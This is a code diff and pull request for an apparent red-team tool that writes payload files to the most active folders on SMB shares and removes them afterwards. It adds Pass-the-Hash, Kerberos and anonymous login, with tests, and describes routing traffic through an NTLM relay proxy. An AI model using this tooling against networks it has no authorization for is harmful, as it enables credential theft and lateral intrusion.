-        # Try to create a Tree connection to the share
         try:
             tree_id = self.connection.connectTree(share=share)
         except Exception as e:
             logger.error(
-                "Failed to write payload. Could not connected to share.",
+                "Failed to write payload. Could not connect to share.",
                 extra={"path": f"\\\\{self.host}\\{share}", "exception": str(e)},
             )
             return None
 
-        # Try to open a file for writing
         try:
             file_handle = self.connection.createFile(tree_id, payload_path)
-            logger.info(" for writing.", extra={"path": full_path})
+            logger.info("Opened file for writing.", extra={"path": full_path})
         except Exception as e:
             logger.error(
                 "Failed to write payload. Could not create file.",
@@ -229,10 +188,9 @@ class HostTarget:
             )
             return None
 
-        # Try to write to the file
         try:
             self.connection.writeFile(treeId=tree_id, fileId=file_handle, data=payload)
-            logger.info("Successfuly wrote payload file.", extra={"path": full_path})
+            logger.info("Successfully wrote payload file.", extra={"path": full_path})
         except Exception as e:
             logger.error(
                 "Failed to write payload. Could not write to open file.",
@@ -240,7 +198,6 @@ class HostTarget:
             )
             return None
 
-        # Try to close the file
         try:
             self.connection.closeFile(treeId=tree_id, fileId=file_handle)
         except Exception as e:
@@ -250,7 +207,6 @@ class HostTarget:
             )
             return None
 
-        # Try to close the Tree connection to the share
         try:
             self.connection.disconnectTree(tree_id)
         except Exception as e:
@@ -263,43 +219,15 @@ class HostTarget:
         return full_path
 
     def delete_payloads(self):
-        """
-        Delete all payloads from target paths.
-        Attempts to delete payload files from each path stored in self.paths.
-        For each failed deletion, the full network path is added to a list.
-
-        Returns:
-            list: A list of network paths where payload deletion failed.
-                  Empty list if all deletions were successful.
-                  Paths are in the format '\\host\path'.
-        """
-
+        """Delete every payload at ``self.paths``; return paths that failed."""
         payloads_not_deleted = []
         for path in self.paths:
-            result = self.delete_payload(path)
-            if result is False:
+            if self.delete_payload(path) is False:
                 payloads_not_deleted.append(f"\\\\{self.host}\\{path}")
         return payloads_not_deleted
 
     def delete_payload(self, path: str):
-        """
-        Deletes a specified payload from a given path on a remote share.
-
-        Args:
-            path (str): The path to the directory on the remote share.
-            payload_name (str): The name of the payload to be deleted.
-
-        Returns:
-            bool: True if the payload was successfully deleted, False otherwise.
-
-        Raises:
-            Exception: If an error occurs during the deletion process.
-
-        Notes:
-            - The method assumes that the connection to the remote share is already established.
-            - If the connection is not established, the method will print an error message and
-                return False.
-        """
+        """Delete a single payload at ``share\\folder\\…\\file.ext``."""
         share = path.split("\\")[0]
         payload_path = "\\".join(path.split("\\")[1:])
         logger = logging.getLogger("main_logger")
@@ -324,75 +252,43 @@ class HostTarget:
             )
             return False
 
+    # ------------------------------------------------------------------ #
+    # Folder review                                                      #
+    # ------------------------------------------------------------------ #
     def review_all_folders(
         self, folder_rankings, active_threshold_date, depth, fast, ignore_folders=None
     ):
-        """
-        Reviews all folders and updates the folder rankings.
-
-        This method iterates through all the folders in the `self.paths` list,
-        reviews each folder, and updates the `folder_rankings` dictionary with
-        the results.
-
-        Parameters:
-        folder_rankings (dict): A dictionary containing the initial rankings of folders.
-        active_threshold_date (datetime): The threshold date to determine active folders.
-        depth (int): The depth to which the folders should be reviewed.
-        fast (bool): A flag indicating whether to perform a fast review.
-
-        Returns:
-        dict: Updated folder rankings after reviewing all folders.
-        """
+        """Walk every path in ``self.paths`` and update ``folder_rankings``."""
         logger = logging.getLogger("main_logger")
+        if ignore_folders is None:
+            ignore_folders = []
 
         if self.connection is None:
             logger.error(
                 "Failed to review folders. Not connected to host.",
                 extra={"path": f"\\\\{self.host}"},
             )
-            return
-        else:
-            for folder in self.paths:
-                unc_path = f"\\\\{self.host}\\{folder}"
-                logger.debug("Started reviewing path", extra={"path": unc_path})
-                if folder not in ignore_folders:
-                    folder_rankings = {
-                        **folder_rankings,
-                        **self.review_folder(
-                            folder_rankings, folder, active_threshold_date, depth, fast
-                        ),
-                    }
-                else:
-                    logger.debug(
-                        "Skipping review of share or folder based on the --ignore-shares argument.",
-                        extra={"path": unc_path},
-                    )
             return folder_rankings
 
+        for folder in self.paths:
+            unc_path = f"\\\\{self.host}\\{folder}"
+            logger.debug("Started reviewing path", extra={"path": unc_path})
+            if folder in ignore_folders:
+                logger.debug(
+                    "Skipping review of share or folder based on the --ignore-shares argument.",
+                    extra={"path": unc_path},
+                )
+                continue
+            folder_rankings = {
+                **folder_rankings,
+                **self.review_folder(
+                    folder_rankings, folder, active_threshold_date, depth, fast
+                ),
+            }
+        return folder_rankings
+
     def review_folder(self, folder_rankings, path, active_threshold_date, depth, fast):
-        """
-        review_folder(folder_rankings, path, active_threshold, depth, fast)
-
-        :param dict folder_rankings: Dictionary of folder UNC paths and rankings reflecting the
-        number of active files in the folder. {<folder UNC path>: <ranking>}
-        :param str path: Path to the folder being accessed, excluding the host name. For example,
-        if the folder is located at \\\\host\\share\\folder, then the path is 'share\\folder'.
-        :param int active_threshold: Number of days within which file access constitutes a file
-        being active
-        :param int depth: Number of layers of folders to search. 1 searches only the specified
-        folder and none of its subfolders.
-        :param bool fast: If True, the current folder will be marked as active as soon as a
-        single file is found. A rank of 1 will be assigned to all active folders.
-
-        :return: Dictionary of folder UNC paths as keys and rankings as values
-
-        Iterates over files and subfolders starting at the specified UNC path up to the
-        specified depth. Each folder is assigned a rank, tracked in folder rankings by its
-        UNC path, based on the number of active files it contains. Active files are files
-        accessed within the number of days specified in active threshold. If fast is set
-        to True, then the folder will receive a rank of 1 or 0 depending on if it contains
-        at least one active file or none.
-        """
+        """Recursively rank ``path`` by the count of active files it holds."""
         logger = logging.getLogger("main_logger")
         ranking = 0
         subfolders = []
@@ -410,15 +306,14 @@ class HostTarget:
             return folder_rankings
 
         for listing in listings:
-            reviewed = fast and ranking > 0  # Review completed if in fast and ranking is non-zero
+            reviewed = fast and ranking > 0  # Done reviewing if in fast mode + ranking nonzero
             is_file = not listing.is_directory()
             name = listing.get_longname()
 
             # If folder is active and max_depth is reached
             if reviewed and depth_reached:
-                break  # Stop reviewing items in the folder
+                break
 
-            # For active files in the directory when the review is not yet completed
             elif (
                 not reviewed
                 and is_file
@@ -427,27 +322,21 @@ class HostTarget:
                     threshold_date=active_threshold_date,
                 )
             ):
-                ranking += 1  # Increment the folder ranking
+                ranking += 1
 
-            # For subfolders in the directory
             elif not (is_file or depth_reached or name == "." or name == ".."):
-                # If max depth is not reached
                 if folder == "":
                     subfolder_path = f"{share}\\{name}"
                 else:
                     subfolder_path = f"{share}\\{folder}\\{name}"
-                subfolders.append(f"{subfolder_path}")  # Add the subfolder to the list of folders
+                subfolders.append(f"{subfolder_path}")
 
-        # Recursion: Call this function on all subfolders to review them if\
-        # max depth is not reached.
-        # Update folder_rankings as each subfolder is reviewed.
-        if not depth_reached:  # If the max depth has not been reached
+        if not depth_reached:
             for subfolder in subfolders:
                 # Requires python 3.9 or greater
                 folder_rankings = folder_rankings | self.review_folder(
                     folder_rankings, subfolder, active_threshold_date, depth - 1, fast
                 )
 
-        # Update folder_rankings with the rank of the current folder and return it
         folder_rankings[f"\\\\{self.host}\\{path}"] = ranking
         return folder_rankings

--- a/tests/test_auth.py
+++ b/tests/test_auth.py
@@ -1,0 +1,228 @@
+"""Tests for the credential / auth-flow plumbing added in 0.0.5."""
+
+from unittest.mock import MagicMock, patch
+import pytest
+
+from linksiren.__main__ import AuthContext, Credentials, _build_auth_context, _parse_hashes
+from linksiren.target import HostTarget
+
+
+# ---------------------------------------------------------- AuthContext API ---
+
+
+def test_credentials_alias_is_authcontext():
+    """``Credentials`` is kept as an alias for backwards compatibility."""
+    assert Credentials is AuthContext
+
+
+def test_authcontext_defaults_are_empty():
+    auth = AuthContext()
+    assert auth.username == ""
+    assert auth.password == ""
+    assert auth.lmhash == ""
+    assert auth.nthash == ""
+    assert auth.aes_key == ""
+    assert auth.kdc_host is None
+    assert auth.use_kerberos is False
+    assert auth.no_pass is False
+
+
+# ----------------------------------------------------------- hash parsing ---
+
+
+def test_parse_hashes_empty():
+    assert _parse_hashes(None) == ("", "")
+    assert _parse_hashes("") == ("", "")
+
+
+def test_parse_hashes_full_pair():
+    lm, nt = _parse_hashes("aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0")
+    assert lm == "aad3b435b51404eeaad3b435b51404ee"
+    assert nt == "31d6cfe0d16ae931b73c59d7e0c089c0"
+
+
+def test_parse_hashes_bare_nthash():
+    """A bare NT hash with no colon is accepted (LM left empty)."""
+    lm, nt = _parse_hashes("31d6cfe0d16ae931b73c59d7e0c089c0")
+    assert lm == ""
+    assert nt == "31d6cfe0d16ae931b73c59d7e0c089c0"
+
+
+# ----------------------------------------------- _build_auth_context (CLI) ---
+
+
+def _make_args(**kwargs):
+    """Build an args-like object that supports ``in`` and ``getattr``."""
+
+    class _A:
+        pass
+
+    a = _A()
+    for k, v in kwargs.items():
+        setattr(a, k, v)
+    # __contains__ needs to be a real method for ``'credentials' in args``.
+    a.__class__ = type("_Args", (_A,), {"__contains__": lambda self, k: hasattr(self, k)})
+    return a
+
+
+def test_build_auth_context_password_only():
+    args = _make_args(credentials="DOMAIN/user:passw0rd")
+    auth = _build_auth_context(args)
+    assert auth.domain == "DOMAIN"
+    assert auth.username == "user"
+    assert auth.password == "passw0rd"
+    assert auth.lmhash == ""
+    assert auth.nthash == ""
+    assert auth.use_kerberos is False
+
+
+def test_build_auth_context_with_hashes():
+    args = _make_args(
+        credentials="DOMAIN/user",
+        hashes="aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0",
+    )
+    auth = _build_auth_context(args)
+    assert auth.username == "user"
+    assert auth.lmhash == "aad3b435b51404eeaad3b435b51404ee"
+    assert auth.nthash == "31d6cfe0d16ae931b73c59d7e0c089c0"
+
+
+def test_build_auth_context_kerberos_flags():
+    args = _make_args(
+        credentials="DOMAIN/user",
+        k=True,
+        aesKey="cafebabe" * 8,
+        dc_ip="dc01.example.local",
+        no_pass=True,
+    )
+    auth = _build_auth_context(args)
+    assert auth.use_kerberos is True
+    assert auth.aes_key == "cafebabe" * 8
+    assert auth.kdc_host == "dc01.example.local"
+    # -no-pass without -hashes should blank the password
+    assert auth.password == ""
+    assert auth.no_pass is True
+
+
+def test_build_auth_context_no_pass_with_hashes_keeps_password_empty():
+    """-no-pass + -hashes: password was never supplied, stays empty."""
+    args = _make_args(
+        credentials="DOMAIN/user",
+        hashes="aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0",
+        no_pass=True,
+    )
+    auth = _build_auth_context(args)
+    assert auth.password == ""
+    assert auth.nthash == "31d6cfe0d16ae931b73c59d7e0c089c0"
+
+
+def test_build_auth_context_no_credentials_returns_empty():
+    """``generate`` mode has no credentials arg."""
+    args = _make_args(mode="generate")
+    auth = _build_auth_context(args)
+    assert auth == AuthContext()
+
+
+# ------------------------------------ HostTarget.connect dispatches on -k ---
+
+
+@pytest.fixture
+def smb_connection_mock():
+    return MagicMock()
+
+
+@pytest.fixture
+def fresh_target():
+    t = HostTarget(host="example.local")
+    t.connection = None
+    return t
+
+
+@pytest.fixture
+def credentials():
+    """Plain NTLM password credentials."""
+    return AuthContext(
+        domain="test_domain",
+        username="test_user",
+        password="test_password",
+    )
+
+
+@pytest.fixture
+def hash_credentials():
+    """Pass-the-Hash credentials (empty NT hash here is fine for fixture-level
+    assertions; tests check that the values are forwarded, not their crypto)."""
+    return AuthContext(
+        domain="test_domain",
+        username="test_user",
+        password="",
+        lmhash="aad3b435b51404eeaad3b435b51404ee",
+        nthash="31d6cfe0d16ae931b73c59d7e0c089c0",
+        no_pass=True,
+    )
+
+
+@pytest.fixture
+def kerberos_credentials():
+    """Kerberos credentials with a ccache-style empty password (TGT supplied
+    out-of-band via $KRB5CCNAME at runtime)."""
+    return AuthContext(
+        domain="test_domain",
+        username="test_user",
+        password="",
+        use_kerberos=True,
+        kdc_host="dc01.test_domain",
+        no_pass=True,
+    )
+
+
+def test_connect_password_calls_login(fresh_target, smb_connection_mock, credentials):
+    with patch("linksiren.target.SMBConnection", return_value=smb_connection_mock):
+        fresh_target.connect(credentials)
+    smb_connection_mock.login.assert_called_once_with(
+        "test_user", "test_password", "test_domain", "", "", True
+    )
+    smb_connection_mock.kerberosLogin.assert_not_called()
+    assert fresh_target.logged_in is True
+
+
+def test_connect_with_hashes_forwards_hashes(fresh_target, smb_connection_mock, hash_credentials):
+    with patch("linksiren.target.SMBConnection", return_value=smb_connection_mock):
+        fresh_target.connect(hash_credentials)
+    smb_connection_mock.login.assert_called_once_with(
+        "test_user",
+        "",
+        "test_domain",
+        "aad3b435b51404eeaad3b435b51404ee",
+        "31d6cfe0d16ae931b73c59d7e0c089c0",
+        True,
+    )
+    smb_connection_mock.kerberosLogin.assert_not_called()
+
+
+def test_connect_kerberos_calls_kerberos_login(
+    fresh_target, smb_connection_mock, kerberos_credentials
+):
+    with patch("linksiren.target.SMBConnection", return_value=smb_connection_mock):
+        fresh_target.connect(kerberos_credentials)
+    smb_connection_mock.login.assert_not_called()
+    smb_connection_mock.kerberosLogin.assert_called_once_with(
+        user="test_user",
+        password="",
+        domain="test_domain",
+        lmhash="",
+        nthash="",
+        aesKey="",
+        kdcHost="dc01.test_domain",
+        useCache=True,
+    )
+    assert fresh_target.logged_in is True
+
+
+def test_connect_kerberos_error_is_swallowed(fresh_target, smb_connection_mock, kerberos_credentials):
+    """A failed Kerberos auth on one host must not kill the whole run."""
+    smb_connection_mock.kerberosLogin.side_effect = RuntimeError("kerberos boom")
+    with patch("linksiren.target.SMBConnection", return_value=smb_connection_mock):
+        fresh_target.connect(kerberos_credentials)
+    assert fresh_target.connection is None
+    assert fresh_target.logged_in is False


### PR DESCRIPTION
## Summary
First feature release on top of 0.0.5. Adds Pass-the-Hash, Kerberos, and anonymous (NULL-session) SMB authentication to every credentialed subcommand, plus an `AuthContext` dataclass that centralizes credential state. Documents the SOCKS-proxy routing pattern.

## Changes
* `-no-pass -hashes LMHASH:NTHASH` (PtH; bare NT hash form, no colon, also accepted).
* `-no-pass -k [-aesKey <hex>] -dc-ip <ip-or-fqdn>` (Kerberos via ccache referenced by `$KRB5CCNAME`).
* `--anonymous` (NULL-session). `credentials` positional becomes optional; the parser rejects `--anonymous` combined with a positional.
* `AuthContext` dataclass + backwards-compatible alias `Credentials = AuthContext`. Shared `_add_auth_args` helper keeps the flags identical across `rank` / `identify` / `deploy` / `cleanup`.
* `HostTarget.connect` dispatches on anonymous / Kerberos / password.
* Kerberos IP-to-FQDN auto-resolve: when `-k` is set and the target host is an IP literal, reverse DNS provides the FQDN for the cifs SPN; on lookup failure a warning points at FQDN UNC paths in the targets file.
* README: new `# Authentication` section (4-row table covering Password / PtH / Kerberos / Anonymous) and `### Routing through a SOCKS proxy` showing the `impacket-ntlmrelayx -socks` + `proxychains4 linksiren ...` pattern.
* `CHANGELOG.md` 0.1.0 entry.

## Version bump
`0.0.5` -> `0.1.0` (PyPI release on merge)